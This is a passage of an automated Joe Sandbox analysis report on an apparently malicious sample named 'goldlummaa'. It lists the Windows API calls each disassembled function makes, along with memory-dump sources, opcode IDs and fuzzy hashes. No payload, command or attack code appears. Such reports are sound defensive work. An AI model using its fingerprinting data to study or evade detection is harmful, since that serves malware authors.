                                                                                                                  • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00C6DD0B
                                                                                                                    • Part of subcall function 00C6C8A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C6D6D0,?,00000000,-00000008), ref: 00C6C902
                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C6DF5D
                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C6DFA3
                                                                                                                  • GetLastError.KERNEL32 ref: 00C6E046
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2112829910-0
                                                                                                                  • Opcode ID: 80bde9dd6e100f41033b6aeb676d05205d4f88c4a3ec1df1fbf511f54d3f9320
                                                                                                                  • Instruction ID: 150e0b8e4a3efaf36c3a19130549cb76f83bbbf913184abc63e0d71b5237ba5a
                                                                                                                  • Opcode Fuzzy Hash: 80bde9dd6e100f41033b6aeb676d05205d4f88c4a3ec1df1fbf511f54d3f9320
                                                                                                                  • Instruction Fuzzy Hash: B5D16B75E00248DFCB25CFA8D8C4AADBBB5FF09310F28416AE566EB351D730A946CB50
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustPointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1740715915-0
                                                                                                                  • Opcode ID: f20294685bfeb613792b9abfd68fdc0fb4ff83180c7eac70a3994be33062993c
                                                                                                                  • Instruction ID: 26c2d6608394a1c378ef266aded2e16e863faf77d417657e1e2fa51737b0b898
                                                                                                                  • Opcode Fuzzy Hash: f20294685bfeb613792b9abfd68fdc0fb4ff83180c7eac70a3994be33062993c
                                                                                                                  • Instruction Fuzzy Hash: A351C3716016069FEB398F54D8C1BBA77A4EF04710F24462DFA16972A1EF31ED88EB50
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00C6C8A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C6D6D0,?,00000000,-00000008), ref: 00C6C902
                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00C6C0CE,?,?,?,00000000), ref: 00C6BD8C
                                                                                                                  • __dosmaperr.LIBCMT ref: 00C6BD93
                                                                                                                  • GetLastError.KERNEL32(00000000,00C6C0CE,?,?,00000000,?,?,?,00000000,00000000,?,00C6C0CE,?,?,?,00000000), ref: 00C6BDCD
                                                                                                                  • __dosmaperr.LIBCMT ref: 00C6BDD4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1913693674-0
                                                                                                                  • Opcode ID: 14bf8149273f2e06787f77a776eeeb86cba642a8a54e2b18a22cf5061062336b
                                                                                                                  • Instruction ID: b8a8a5eb33efdcc32f3bbda2b397d3cf058218a15423ed707b102c81cf065ecb
                                                                                                                  • Opcode Fuzzy Hash: 14bf8149273f2e06787f77a776eeeb86cba642a8a54e2b18a22cf5061062336b
                                                                                                                  • Instruction Fuzzy Hash: CE21D171600206BFDB30AFA6CCC0D6BB7A8FF443647108428F829DB151DB31ED92AB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a9b5aa870f7c3c29fb62363b973577ff6dc9685d1c05f8c95521230a536e6016
                                                                                                                  • Instruction ID: bbd70bc84b3756fee1935337d646dad07a49d5d7d6963ba5b2e1b69a7b3d24c4
                                                                                                                  • Opcode Fuzzy Hash: a9b5aa870f7c3c29fb62363b973577ff6dc9685d1c05f8c95521230a536e6016
                                                                                                                  • Instruction Fuzzy Hash: 96219D71600205AFDB30AFB6CCC1DBB77A9AF44368710C925F9A9D7260DB31ED509BA1
                                                                                                                  APIs
                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00C6C9A5
                                                                                                                    • Part of subcall function 00C6C8A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C6D6D0,?,00000000,-00000008), ref: 00C6C902
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C6C9DD
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C6C9FD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 158306478-0
                                                                                                                  • Opcode ID: 5f96ec0a29383a4a8202b2e859665a993e4cd7d3e549f58dd41bec5d4aaa6b01
                                                                                                                  • Instruction ID: 3afbbbff5839fcabae08682efcaa146f85b5fe0f67433f6fcf681e9d18bee32a
                                                                                                                  • Opcode Fuzzy Hash: 5f96ec0a29383a4a8202b2e859665a993e4cd7d3e549f58dd41bec5d4aaa6b01
                                                                                                                  • Instruction Fuzzy Hash: 0F11D6F190561DBFA731A7F29CCDDBF295CDE583A43100025F656E2142FE64CE41A6B1
                                                                                                                  APIs
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00C61E2D
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00C61E3B
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00C61E54
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00C61E93
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2261580123-0
                                                                                                                  • Opcode ID: 3e2d5916e41cb5f8aece1802bde29103265a04ce7037824baf0180ec92841ff5
                                                                                                                  • Instruction ID: 2da6e6eb0d424ced58eb7fde2157d86eae6ba6fe01fb81cf9ec5d7634608008e
                                                                                                                  • Opcode Fuzzy Hash: 3e2d5916e41cb5f8aece1802bde29103265a04ce7037824baf0180ec92841ff5
                                                                                                                  • Instruction Fuzzy Hash: 4621E4B0E042098FCB18EFA8C485BAEBBF1EF48300F05845DE859A7351DB399A41DF61
                                                                                                                  APIs
                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00C6F4A1,00000000,00000001,00000000,?,?,00C6E09A,?,00000000,00000000), ref: 00C6FD17
                                                                                                                  • GetLastError.KERNEL32(?,00C6F4A1,00000000,00000001,00000000,?,?,00C6E09A,?,00000000,00000000,?,?,?,00C6D9E0,00000000), ref: 00C6FD23
                                                                                                                    • Part of subcall function 00C6FD74: CloseHandle.KERNEL32(FFFFFFFE,00C6FD33,?,00C6F4A1,00000000,00000001,00000000,?,?,00C6E09A,?,00000000,00000000,?,?), ref: 00C6FD84
                                                                                                                  • ___initconout.LIBCMT ref: 00C6FD33
                                                                                                                    • Part of subcall function 00C6FD55: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C6FCF1,00C6F48E,?,?,00C6E09A,?,00000000,00000000,?), ref: 00C6FD68
                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00C6F4A1,00000000,00000001,00000000,?,?,00C6E09A,?,00000000,00000000,?), ref: 00C6FD48
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2744216297-0
                                                                                                                  • Opcode ID: a48029367084bc7ed9f1b0d20f43ddddbe072618b003fcf21a9154b7b476c651
                                                                                                                  • Instruction ID: 06b96782cf60b77791e5206782692cd02750350900cc60ca3230386906187f0b
                                                                                                                  • Opcode Fuzzy Hash: a48029367084bc7ed9f1b0d20f43ddddbe072618b003fcf21a9154b7b476c651
                                                                                                                  • Instruction Fuzzy Hash: 30F0C036540116BBCF232F95EC4CB9E3F26FB493A1B044124FA1D95130DA7299A5AB91
                                                                                                                  APIs
                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C64F13
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00C64F22
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00C64F2B
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00C64F38
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2933794660-0
                                                                                                                  • Opcode ID: 332bb9336269f4b4d79c33b330545a4299c237ae359ea57905ef6962271392d7
                                                                                                                  • Instruction ID: 9a6e7c6a1abb1b3c8b5c7dff978cee3f769a0edd9055681235deb87039a01d3f
                                                                                                                  • Opcode Fuzzy Hash: 332bb9336269f4b4d79c33b330545a4299c237ae359ea57905ef6962271392d7
                                                                                                                  • Instruction Fuzzy Hash: 17F06274D5020DEBCB00DBB4DA49B9EBBF4FF1C204BA14995A516E7110EB30AB889B51
                                                                                                                  APIs
                                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00C68AFE,?,?,00000000,00000000,00000000,?), ref: 00C68C22
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EncodePointer
                                                                                                                  • String ID: MOC$RCC
                                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                                  • Opcode ID: d9440e009386541ccf5878f9e7850b4e951d8284fc666aae0f4a03b2ab7b9c89
                                                                                                                  • Instruction ID: a0e2df37cfabdccd9e00604075e44e839d4ed4a9558bd7bfd95eaf5f44d018d0
                                                                                                                  • Opcode Fuzzy Hash: d9440e009386541ccf5878f9e7850b4e951d8284fc666aae0f4a03b2ab7b9c89
                                                                                                                  • Instruction Fuzzy Hash: 8C418A71900209EFCF25DF98CD81AEE7BB5FF48304F144659FA1467251D7359A50DB60
                                                                                                                  APIs
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00C686E0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ___except_validate_context_record
                                                                                                                  • String ID: csm$csm
                                                                                                                  • API String ID: 3493665558-3733052814
                                                                                                                  • Opcode ID: e18761915babe4a514628ee9eaa99c03599d9fb2baf91e0370bb6c98822550df
                                                                                                                  • Instruction ID: 749f169c7555a7e068ed66d6e3e98ae38940298b14e8f5798ceca97803932b8f
                                                                                                                  • Opcode Fuzzy Hash: e18761915babe4a514628ee9eaa99c03599d9fb2baf91e0370bb6c98822550df
                                                                                                                  • Instruction Fuzzy Hash: 6331B536400219DBCF368F50DCC49AA7BE6FF08715B384759F86449221DB32CDA6EB91
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                  • String ID: L
                                                                                                                  • API String ID: 2610073882-2909332022
                                                                                                                  • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                  • Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
                                                                                                                  • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                  • Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: MetricsSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4116985748-3916222277
                                                                                                                  • Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                  • Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
                                                                                                                  • Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                  • Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86